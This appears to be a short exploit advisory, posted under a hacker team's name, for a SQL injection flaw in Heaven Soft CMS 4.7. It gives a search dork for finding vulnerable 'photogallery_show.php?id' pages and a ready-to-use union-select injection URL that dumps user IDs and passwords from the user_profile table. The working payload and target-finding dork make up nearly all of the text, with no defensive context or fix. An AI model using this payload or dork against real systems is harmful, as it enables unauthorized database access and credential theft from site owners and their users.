19 lines
No EOL
545 B
Text
19 lines
No EOL
545 B
Text
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
[x] Tybe: SQL Injection Vulnerabilities
|
|
[x] Vendor: http://www.newyorkindoorcricket.com/
|
|
[x] Script Name: Heaven Soft, CMS Version: 4.7
|
|
[x] author: PrinceofHacking
|
|
[x] Team: Ashiyane Digital Security Team
|
|
[x] Mail : Prince[dot]H4ck@gmail[dot]com
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
D0rk:"photogallery_show.php?id"
|
|
|
|
|
|
Exploit:
|
|
|
|
http://localhost/photogallery_show.php?id=-1
|
|
union+select+group_concat(user_id,0x3a,password),2+from+user_profile--
|
|
|
|
[!]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |